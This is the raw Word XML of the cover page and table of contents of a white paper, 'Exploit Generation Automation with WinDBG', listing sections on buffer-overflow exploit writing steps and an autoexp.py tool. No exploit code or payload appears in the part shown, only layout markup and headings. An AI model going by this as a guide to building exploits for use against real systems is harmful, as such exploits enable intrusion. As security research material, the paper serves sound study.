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10527602"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="24B48E92" w14:textId="77777777" w:rsidR="005420D1" w:rsidRDefault="005420D1">
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wpg">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3BD87FD9" wp14:editId="7BAD750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945521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0072c6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486EB67A" wp14:editId="5A5B3DC3">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="page">
                      <wp:align>center</wp:align>
                    </wp:positionH>
                    <mc:AlternateContent>
                      <mc:Choice Requires="wp14">
                        <wp:positionV relativeFrom="page">
                          <wp14:pctPosVOffset>81800</wp14:pctPosVOffset>
                        </wp:positionV>
                      </mc:Choice>
                      <mc:Fallback>
                        <wp:positionV relativeFrom="page">
                          <wp:posOffset>8746490</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146DBA5" w14:textId="77777777" w:rsidR="005420D1" w:rsidRDefault="005420D1">
                                    <w:pPr>
                                      <w:pStyle w:val="NoSpacing"/>
                                      <w:jc w:val="right"/>
                                      <w:rPr>
                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs w:val="28"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r>
                                      <w:rPr>
                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs w:val="28"/>
                                      </w:rPr>
                                      <w:t>Csaba Fitzl</w:t>
                                    </w:r>
                                  </w:p>
                                </w:sdtContent>
                              </w:sdt>
                              <w:p w14:paraId="26652CE6" w14:textId="77777777" w:rsidR="005420D1" w:rsidRDefault="007A7A2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420D1">
                                      <w:rPr>
                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                        <w:sz w:val="18"/>
                                        <w:szCs w:val="18"/>
                                      </w:rPr>
                                      <w:t>fitzl.csaba@gmail.com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6EB67A" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m0,0l0,21600,21600,21600,2160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146DBA5" w14:textId="77777777" w:rsidR="005420D1" w:rsidRDefault="005420D1">
                              <w:pPr>
                                <w:pStyle w:val="NoSpacing"/>
                                <w:jc w:val="right"/>
                                <w:rPr>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:t>Csaba Fitzl</w:t>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                        <w:p w14:paraId="26652CE6" w14:textId="77777777" w:rsidR="005420D1" w:rsidRDefault="007A7A2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420D1">
                                <w:rPr>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="18"/>
                                  <w:szCs w:val="18"/>
                                </w:rPr>
                                <w:t>fitzl.csaba@gmail.com</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48567DFD" wp14:editId="392C233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6974E1" w14:textId="77777777" w:rsidR="005420D1" w:rsidRDefault="007A7A29">
                                <w:pPr>
                                  <w:jc w:val="right"/>
                                  <w:rPr>
                                    <w:color w:val="0072C6" w:themeColor="accent1"/>
                                    <w:sz w:val="64"/>
                                    <w:szCs w:val="64"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:sdt>
                                  <w:sdtPr>
                                    <w:rPr>
                                      <w:caps/>
                                      <w:color w:val="0072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420D1">
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="0072C6" w:themeColor="accent1"/>
                                        <w:sz w:val="64"/>
                                        <w:szCs w:val="64"/>
                                      </w:rPr>
                                      <w:t>Exploit Generation Automation with WinDBG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5B5BECC" w14:textId="77777777" w:rsidR="005420D1" w:rsidRDefault="005420D1">
                                    <w:pPr>
                                      <w:jc w:val="right"/>
                                      <w:rPr>
                                        <w:smallCaps/>
                                        <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                                        <w:sz w:val="36"/>
                                        <w:szCs w:val="36"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r>
                                      <w:rPr>
                                        <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                                        <w:sz w:val="36"/>
                                        <w:szCs w:val="36"/>
                                      </w:rPr>
                                      <w:t>White Paper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8567DFD"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616974E1" w14:textId="77777777" w:rsidR="005420D1" w:rsidRDefault="007A7A29">
                          <w:pPr>
                            <w:jc w:val="right"/>
                            <w:rPr>
                              <w:color w:val="0072C6" w:themeColor="accent1"/>
                              <w:sz w:val="64"/>
                              <w:szCs w:val="64"/>
                            </w:rPr>
                          </w:pPr>
                          <w:sdt>
                            <w:sdtPr>
                              <w:rPr>
                                <w:caps/>
                                <w:color w:val="0072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420D1">
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="0072C6" w:themeColor="accent1"/>
                                  <w:sz w:val="64"/>
                                  <w:szCs w:val="64"/>
                                </w:rPr>
                                <w:t>Exploit Generation Automation with WinDBG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5B5BECC" w14:textId="77777777" w:rsidR="005420D1" w:rsidRDefault="005420D1">
                              <w:pPr>
                                <w:jc w:val="right"/>
                                <w:rPr>
                                  <w:smallCaps/>
                                  <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                                <w:t>White Paper</w:t>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                      </w:txbxContent>
                    </v:textbox>
                    <w10:wrap type="square" anchorx="page" anchory="page"/>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
        </w:p>
        <w:p w14:paraId="3DCE2B31" w14:textId="77777777" w:rsidR="005420D1" w:rsidRDefault="005420D1">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
              <w:caps/>
              <w:color w:val="0072C6" w:themeColor="accent1"/>
              <w:spacing w:val="14"/>
              <w:sz w:val="64"/>
              <w:szCs w:val="32"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="1482735270"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="295BBA76" w14:textId="77777777" w:rsidR="00522848" w:rsidRDefault="00522848">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2809EA4F" w14:textId="77777777" w:rsidR="00EA3795" w:rsidRDefault="00522848">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9881"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:caps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc462491407" w:history="1">
            <w:r w:rsidR="00EA3795" w:rsidRPr="00D739A7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.0 Introduction</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc462491407 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F6E9804" w14:textId="77777777" w:rsidR="00EA3795" w:rsidRDefault="007A7A29">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9881"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc462491408" w:history="1">
            <w:r w:rsidR="00EA3795" w:rsidRPr="00D739A7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1 Motivation</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc462491408 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70CA9795" w14:textId="77777777" w:rsidR="00EA3795" w:rsidRDefault="007A7A29">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9881"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc462491409" w:history="1">
            <w:r w:rsidR="00EA3795" w:rsidRPr="00D739A7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2 Typical BoF exploit writing steps</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc462491409 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27262FEF" w14:textId="77777777" w:rsidR="00EA3795" w:rsidRDefault="007A7A29">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9881"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc462491410" w:history="1">
            <w:r w:rsidR="00EA3795" w:rsidRPr="00D739A7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3 Overview of the tool</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc462491410 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F09A096" w14:textId="77777777" w:rsidR="00EA3795" w:rsidRDefault="007A7A29">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9881"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc462491411" w:history="1">
            <w:r w:rsidR="00EA3795" w:rsidRPr="00D739A7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3.1 What can the tool do as of today?</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc462491411 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F62A69C" w14:textId="77777777" w:rsidR="00EA3795" w:rsidRDefault="007A7A29">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9881"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:caps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc462491412" w:history="1">
            <w:r w:rsidR="00EA3795" w:rsidRPr="00D739A7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.0 Setting up the environment</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc462491412 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="769E7BEC" w14:textId="77777777" w:rsidR="00EA3795" w:rsidRDefault="007A7A29">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9881"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc462491413" w:history="1">
            <w:r w:rsidR="00EA3795" w:rsidRPr="00D739A7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1 Verify Installation</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc462491413 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3904F0FD" w14:textId="77777777" w:rsidR="00EA3795" w:rsidRDefault="007A7A29">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9881"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:caps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc462491414" w:history="1">
            <w:r w:rsidR="00EA3795" w:rsidRPr="00D739A7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.0 Using the autoexp.py script</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc462491414 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D9DF540" w14:textId="77777777" w:rsidR="00EA3795" w:rsidRDefault="007A7A29">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9881"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc462491415" w:history="1">
            <w:r w:rsidR="00EA3795" w:rsidRPr="00D739A7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 The exploit file</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc462491415 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7FD65BD5" w14:textId="77777777" w:rsidR="00EA3795" w:rsidRDefault="007A7A29">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9881"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc462491416" w:history="1">
            <w:r w:rsidR="00EA3795" w:rsidRPr="00D739A7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2 Populate the exploit class with PoC/crash info</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc462491416 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D8DF470" w14:textId="77777777" w:rsidR="00EA3795" w:rsidRDefault="007A7A29">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9881"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc462491417" w:history="1">
            <w:r w:rsidR="00EA3795" w:rsidRPr="00D739A7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3 Additional info to populate</w:t>
